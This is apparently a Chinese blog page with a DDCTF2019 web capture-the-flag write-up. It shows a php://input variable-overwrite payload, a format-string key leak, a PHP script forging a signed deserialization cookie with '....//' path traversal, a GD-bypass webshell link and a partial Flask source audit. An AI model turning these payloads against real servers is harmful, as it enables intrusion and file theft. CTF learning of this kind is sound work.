<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web,ctf,">










<meta name="description" content="之前又是打比赛又是五月病，于是好久没更，该高产似那啥一波了x">
<meta name="keywords" content="web,ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="DDCTF2019 web wp">
<meta property="og:url" content="http://yoursite.com/2019/05/27/DDCTF2019-web-wp/index.html">
<meta property="og:site_name" content="k0t0r1の家">
<meta property="og:description" content="之前又是打比赛又是五月病，于是好久没更，该高产似那啥一波了x">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/a1aa5faf674aa7c925058be6ff53027a.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/98f5af21dd0e89c2e895c0558ca3388c.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/07ad385a1dcfa64501a63f361cdddacb.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/ef28a2496afcbbb540df2417a16319ae.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/9684889abf744f08c0ee379b683ce5c8.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/83561a6c4f8e0bc78ff769c9d4477bb8.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/6176490e757c2628c38ee6f732a57d80.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/1a22f584f84926e75b9075b90ff50cb2.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/85996c7b5d75c299e698c82a20795264.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/d57f62e1c1aecf663c3fc65deb157131.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/623f7b7ee7aa11cf41a472ad318e4c70.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/b8d7387d827e3218921cb665c8580ef8.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/700ba752b3565079792da6841be6ab1c.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/a2b1b5f99b46825134738b843f05f2ed.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/a595adf80ad5fc2a61091f4f47f837f0.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/cd3f2311de46eba5cc3a507800eae18b.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/194c7e256fb39f568c44919c27d872f8.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/af4f441326185df6dfd80dc1b84e9675.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/23446d98c49242e5df38e3f8fbee4f1e.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/c158521a6056bb5053390ea1e092861f.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/89873709648b76ed126b513d1c53a0cf.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/0552f084a7be2a5b83c370eff07a8ce7.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/ad798ce63328aa1b8e21bfe39ceefc58.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/234e39680da8fbac538692fee518e463.png">
<meta property="og:updated_time" content="2019-05-27T14:54:31.351Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DDCTF2019 web wp">
<meta name="twitter:description" content="之前又是打比赛又是五月病，于是好久没更，该高产似那啥一波了x">
<meta name="twitter:image" content="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/a1aa5faf674aa7c925058be6ff53027a.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/05/27/DDCTF2019-web-wp/">





  <title>DDCTF2019 web wp | k0t0r1の家</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">k0t0r1の家</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/05/27/DDCTF2019-web-wp/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="k0t0r1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://shifeng-kaze.cn/blog/head/kotori.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="k0t0r1の家">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">DDCTF2019 web wp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-05-27T21:23:36+08:00">
                2019-05-27
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>之前又是打比赛又是五月病，于是好久没更，该高产似那啥一波了x</p>
<a id="more"></a>
<h2 id="滴"><a href="#滴" class="headerlink" title="滴~"></a>滴~</h2><p>这题真的是佛啦，一开始还以为是一道很简单的web签到题，看到title一串乱字符串就加个DDCTF然而并不是flag<br>F12可以看到一个看到一个用base64编码来解析为图片的代码段，然后url上有jpg应该是文件读取。然后尝试两次base64+一次base16成功解出是flag.jpg，于是用这个加密index.php获取源码。<br>解出来可以看到有两层过滤，一开始以为flag在config.php里然而绕不过去。于是去访问一下提示的博客，全篇在讲echo命令，感觉没什么关系。翻翻博主其他的博客，有篇关于swp文件的文章。看了一下然后尝试用python把.config.php.sw[p-a]都跑了一遍都没什么，然后看了看了评论区有人说.practice.txt.swp这个文件，于是和config.php同个操作依旧什么都没有。一脸懵逼之时想到之前拿swp文件时下载下来的都不带点，于是尝试一下practice.txt.swp就tm的拿到了flag文件【黑人问号.jpg</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/a1aa5faf674aa7c925058be6ff53027a.png" alt=""></p>
<p>于是获取一下源码【！可以通过config替换绕过】<br>读一下一个变量覆盖，一个读文件内容与变量相同，那就用php://input<br>payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">get ?k=php://input&amp;uid=1</span><br><span class="line">post 1</span><br></pre></td></tr></table></figure></p>
<h2 id="WEB-签到题"><a href="#WEB-签到题" class="headerlink" title="WEB 签到题"></a>WEB 签到题</h2><p>进去后F12 一下发现index.js</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">function auth() &#123;</span><br><span class="line">	$.ajax(&#123;</span><br><span class="line">		type: &quot;post&quot;,</span><br><span class="line">		url:&quot;http://117.51.158.44/app/Auth.php&quot;,</span><br><span class="line">		contentType: &quot;application/json;charset=utf-8&quot;,</span><br><span class="line">		dataType: &quot;json&quot;,</span><br><span class="line">		beforeSend: function (XMLHttpRequest) &#123;</span><br><span class="line">			XMLHttpRequest.setRequestHeader(&quot;didictf_username&quot;, &quot;&quot;);</span><br><span class="line">		&#125;,</span><br><span class="line">		success: function (getdata) &#123;</span><br><span class="line">			console.log(getdata);</span><br><span class="line">			if(getdata.data !== &apos;&apos;) &#123;</span><br><span class="line">				document.getElementById(&apos;auth&apos;).innerHTML = getdata.data;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;,error:function(error)&#123;</span><br><span class="line">			console.log(error);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>读一下可以知道需要在头部中传一个didictf_name的值过去<br>尝试几次后发现是admin</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/98f5af21dd0e89c2e895c0558ca3388c.png" alt=""></p>
<p>响应提示/app/fL2XID2i0Cdh.php<br>于是打开得到/app/Application.php和/app/Session.php的源码<br>先读一下/app/Application.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">// url:app/Application.php</span><br><span class="line">Class Application &#123;</span><br><span class="line">    var $path = &apos;&apos;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    public function response($data, $errMsg = &apos;success&apos;) &#123;</span><br><span class="line">        $ret = [&apos;errMsg&apos; =&gt; $errMsg,</span><br><span class="line">            &apos;data&apos; =&gt; $data];</span><br><span class="line">        $ret = json_encode($ret);</span><br><span class="line">        header(&apos;Content-type: application/json&apos;);</span><br><span class="line">        echo $ret;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function auth() &#123;</span><br><span class="line">        $DIDICTF_ADMIN = &apos;admin&apos;;</span><br><span class="line">        if(!empty($_SERVER[&apos;HTTP_DIDICTF_USERNAME&apos;]) &amp;&amp; $_SERVER[&apos;HTTP_DIDICTF_USERNAME&apos;] == $DIDICTF_ADMIN) &#123;</span><br><span class="line">            $this-&gt;response(&apos;您当前当前权限为管理员----请访问:app/fL2XID2i0Cdh.php&apos;);</span><br><span class="line">            return TRUE;</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            $this-&gt;response(&apos;抱歉，您没有登陆权限，请获取权限后访问-----&apos;,&apos;error&apos;);</span><br><span class="line">            exit();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    private function sanitizepath($path) &#123;</span><br><span class="line">        $path = trim($path);</span><br><span class="line">        $path=str_replace(&apos;../&apos;,&apos;&apos;,$path);</span><br><span class="line">        $path=str_replace(&apos;..\\&apos;,&apos;&apos;,$path);</span><br><span class="line">        return $path;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __destruct() &#123;</span><br><span class="line">        if(empty($this-&gt;path)) &#123;</span><br><span class="line">            exit();</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            $path = $this-&gt;sanitizepath($this-&gt;path);</span><br><span class="line">            if(strlen($path) !== 18) &#123;</span><br><span class="line">                exit();</span><br><span class="line">            &#125;</span><br><span class="line">            $this-&gt;response($data=file_get_contents($path),&apos;Congratulations&apos;);</span><br><span class="line">        &#125;</span><br><span class="line">        exit();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到Application类的析构函数进行了文件读取，还对路径进行了过滤，不过我们可以双写绕过，而且处理后的文件路径长正好是18于是不用理那个长度判断<br>到这里可以猜测是要我们反序列化这个类去读取某个文件<br>然后再读/app/Session.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">// url:app/Session.php</span><br><span class="line">include &apos;Application.php&apos;;</span><br><span class="line">class Session extends Application &#123;</span><br><span class="line"></span><br><span class="line">    //key建议为8位字符串</span><br><span class="line">    var $eancrykey                  = &apos;&apos;;</span><br><span class="line">    var $cookie_expiration          = 7200;</span><br><span class="line">    var $cookie_name                = &apos;ddctf_id&apos;;</span><br><span class="line">    var $cookie_path                = &apos;&apos;;</span><br><span class="line">    var $cookie_domain              = &apos;&apos;;</span><br><span class="line">    var $cookie_secure              = FALSE;</span><br><span class="line">    var $activity                   = &quot;DiDiCTF&quot;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    public function index()</span><br><span class="line">    &#123;</span><br><span class="line">    if(parent::auth()) &#123;</span><br><span class="line">            $this-&gt;get_key();</span><br><span class="line">            if($this-&gt;session_read()) &#123;</span><br><span class="line">                $data = &apos;DiDI Welcome you %s&apos;;</span><br><span class="line">                $data = sprintf($data,$_SERVER[&apos;HTTP_USER_AGENT&apos;]);</span><br><span class="line">                parent::response($data,&apos;sucess&apos;);</span><br><span class="line">            &#125;else&#123;</span><br><span class="line">                $this-&gt;session_create();</span><br><span class="line">                $data = &apos;DiDI Welcome you&apos;;</span><br><span class="line">                parent::response($data,&apos;sucess&apos;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private function get_key() &#123;</span><br><span class="line">        //eancrykey  and flag under the folder</span><br><span class="line">        $this-&gt;eancrykey =  file_get_contents(&apos;../config/key.txt&apos;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function session_read() &#123;</span><br><span class="line">        if(empty($_COOKIE)) &#123;</span><br><span class="line">        return FALSE;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        $session = $_COOKIE[$this-&gt;cookie_name];</span><br><span class="line">        if(!isset($session)) &#123;</span><br><span class="line">            parent::response(&quot;session not found&quot;,&apos;error&apos;);</span><br><span class="line">            return FALSE;</span><br><span class="line">        &#125;</span><br><span class="line">        $hash = substr($session,strlen($session)-32);</span><br><span class="line">        $session = substr($session,0,strlen($session)-32);</span><br><span class="line"></span><br><span class="line">        if($hash !== md5($this-&gt;eancrykey.$session)) &#123;</span><br><span class="line">            parent::response(&quot;the cookie data not match&quot;,&apos;error&apos;);</span><br><span class="line">            return FALSE;</span><br><span class="line">        &#125;</span><br><span class="line">        $session = unserialize($session);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        if(!is_array($session) OR !isset($session[&apos;session_id&apos;]) OR !isset($session[&apos;ip_address&apos;]) OR !isset($session[&apos;user_agent&apos;]))&#123;</span><br><span class="line">            return FALSE;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        if(!empty($_POST[&quot;nickname&quot;])) &#123;</span><br><span class="line">            $arr = array($_POST[&quot;nickname&quot;],$this-&gt;eancrykey);</span><br><span class="line">            $data = &quot;Welcome my friend %s&quot;;</span><br><span class="line">            foreach ($arr as $k =&gt; $v) &#123;</span><br><span class="line">                $data = sprintf($data,$v);</span><br><span class="line">            &#125;</span><br><span class="line">            parent::response($data,&quot;Welcome&quot;);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        if($session[&apos;ip_address&apos;] != $_SERVER[&apos;REMOTE_ADDR&apos;]) &#123;</span><br><span class="line">            parent::response(&apos;the ip addree not match&apos;.&apos;error&apos;);</span><br><span class="line">            return FALSE;</span><br><span class="line">        &#125;</span><br><span class="line">        if($session[&apos;user_agent&apos;] != $_SERVER[&apos;HTTP_USER_AGENT&apos;]) &#123;</span><br><span class="line">            parent::response(&apos;the user agent not match&apos;,&apos;error&apos;);</span><br><span class="line">            return FALSE;</span><br><span class="line">        &#125;</span><br><span class="line">        return TRUE;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private function session_create() &#123;</span><br><span class="line">        $sessionid = &apos;&apos;;</span><br><span class="line">        while(strlen($sessionid) &lt; 32) &#123;</span><br><span class="line">            $sessionid .= mt_rand(0,mt_getrandmax());</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        $userdata = array(</span><br><span class="line">            &apos;session_id&apos; =&gt; md5(uniqid($sessionid,TRUE)),</span><br><span class="line">            &apos;ip_address&apos; =&gt; $_SERVER[&apos;REMOTE_ADDR&apos;],</span><br><span class="line">            &apos;user_agent&apos; =&gt; $_SERVER[&apos;HTTP_USER_AGENT&apos;],</span><br><span class="line">            &apos;user_data&apos; =&gt; &apos;&apos;,</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        $cookiedata = serialize($userdata);</span><br><span class="line">        $cookiedata = $cookiedata.md5($this-&gt;eancrykey.$cookiedata);</span><br><span class="line">        $expire = $this-&gt;cookie_expiration + time();</span><br><span class="line">        setcookie(</span><br><span class="line">            $this-&gt;cookie_name,</span><br><span class="line">            $cookiedata,</span><br><span class="line">            $expire,</span><br><span class="line">            $this-&gt;cookie_path,</span><br><span class="line">            $this-&gt;cookie_domain,</span><br><span class="line">            $this-&gt;cookie_secure</span><br><span class="line">            );</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$ddctf = new Session();</span><br><span class="line">$ddctf-&gt;index();</span><br></pre></td></tr></table></figure>
<p>在session_read()中发现了反序列化，但这个反序列化不是随便都行的，要通过一个hash的验证才行。而hash是通过一串在../config/key.txt中的密钥连接cookie然后进行md5后生成的（这里其实可以用哈希长度扩列攻击吧？）</p>
<p>然后在同个方法中又看到了这段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">if(!empty($_POST[&quot;nickname&quot;])) &#123;</span><br><span class="line">	$arr = array($_POST[&quot;nickname&quot;],$this-&gt;eancrykey);</span><br><span class="line">	$data = &quot;Welcome my friend %s&quot;;</span><br><span class="line">	foreach ($arr as $k =&gt; $v) &#123;</span><br><span class="line">		$data = sprintf($data,$v);</span><br><span class="line">	&#125;</span><br><span class="line">	parent::response($data,&quot;Welcome&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>那我们可以通过将nickname=%s获得密钥<br>这下思路就很清晰了，于是开始操作<br>先访问一下Session.php获取初始的cookie，然后将cookie放在头部然后post <code>nickname=%s</code> 获得密钥EzblrbNS<br>然后构建反序列化字符串，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">Class Application &#123;</span><br><span class="line">var $path = &apos;....//config/flag.txt&apos;;</span><br><span class="line">&#125;</span><br><span class="line">$o=new Application();</span><br><span class="line">$session=serialize($o);</span><br><span class="line">echo urlencode($session.md5(&quot;EzblrbNS&quot;.$session));</span><br></pre></td></tr></table></figure>
<p>最后用burpsuit发送获得flag</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/07ad385a1dcfa64501a63f361cdddacb.png" alt=""></p>
<h2 id="Upload-IMG"><a href="#Upload-IMG" class="headerlink" title="Upload-IMG"></a>Upload-IMG</h2><p>图片上传的题，要求文件中带有phpinfo()。尝试修改了MIME绕过不了，把phpinfo()写在图片中也不行，于是将上传前的图片和上传后的图片对比一下看看过滤了什么</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/ef28a2496afcbbb540df2417a16319ae.png" alt=""></p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/9684889abf744f08c0ee379b683ce5c8.png" alt=""></p>
<p>发现上传前后的图片头部有些许的修改，增加了一段数据，查了一下才知道是gb库的图片二次渲染，会把图片中的代码也给转化成jpg图片的部分<br>绕过的方法查gb库的时候顺便就找到了<br><a href="https://wiki.ioin.in/soft/detail/1q" target="_blank" rel="noopener">绕过GD库渲染的Webshell生成器</a><br>用这里大佬写好的脚本，把里面payload修改一下然后进行运行处理一下图片就可以了。可能一次成功不了多试几张图就好</p>
<h2 id="homebrew-event-loop"><a href="#homebrew-event-loop" class="headerlink" title="homebrew event loop"></a>homebrew event loop</h2><p>一道python的审计题，刚触碰python web所以就详细的分析一下源码<br>首先是开头的部分，是用flask框架搭建的web服务</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">from flask import Flask, session, request, Response</span><br><span class="line">import urllib</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = &apos;*********************&apos; # censored</span><br><span class="line">url_prefix = &apos;/d5afe1f66747e857&apos;</span><br></pre></td></tr></table></figure>
<p>然后看到app.route()这里，传入该方法的参数都是对应页面的url，然后接着下面的方法是处理该页面的代码，于是读一下entry_point()</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">@app.route(url_prefix+&apos;/&apos;)</span><br><span class="line">def entry_point():</span><br><span class="line">	querystring = urllib.unquote(request.query_string)</span><br><span class="line">	request.event_queue = []</span><br><span class="line">	if querystring == &apos;&apos; or (not querystring.startswith(&apos;action:&apos;)) or len(querystring) &gt; 100:</span><br><span class="line">		querystring = &apos;action:index;False#False&apos;</span><br><span class="line">	if &apos;num_items&apos; not in session:</span><br><span class="line">		session[&apos;num_items&apos;] = 0</span><br><span class="line">		session[&apos;points&apos;] = 3</span><br><span class="line">		session[&apos;log&apos;] = []</span><br><span class="line">	request.prev_session = dict(session)</span><br><span class="line">	trigger_event(querystring)</span><br><span class="line">	return execute_event_loop()</span><br></pre></td></tr></table></figure>
<p><code>urllib.unquote(request.query_string)</code>是获得跟着url后的参数，就是？后面的部分，然后再用url解码。然后当传入为空或者不以action或者长度大于100时，跳回主界面。接下面的部分是设置session，然后<code>request.prev_session</code>没查到是用来做什么的，但抓包会发现cookie中有个session的参数<br>用<a href="https://github.com/Paradoxis/Flask-Unsign" target="_blank" rel="noopener">Flask-Unsign</a>处理一下</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/83561a6c4f8e0bc78ff769c9d4477bb8.png" alt=""></p>
<p>会发现和设置的session值一样，看整个代码也没发现有其他地方进行了cookie的处理，于是猜测<code>request.prev_session</code>是用来将需要的回传的参数进行加密后置入cookie中。<br>继续往下读看到<code>trigger_event()</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">def trigger_event(event):</span><br><span class="line">	session[&apos;log&apos;].append(event)</span><br><span class="line">	if len(session[&apos;log&apos;]) &gt; 5: session[&apos;log&apos;] = session[&apos;log&apos;][-5:]</span><br><span class="line">	if type(event) == type([]):</span><br><span class="line">		request.event_queue += event</span><br><span class="line">	else:</span><br><span class="line">		request.event_queue.append(event)</span><br></pre></td></tr></table></figure>
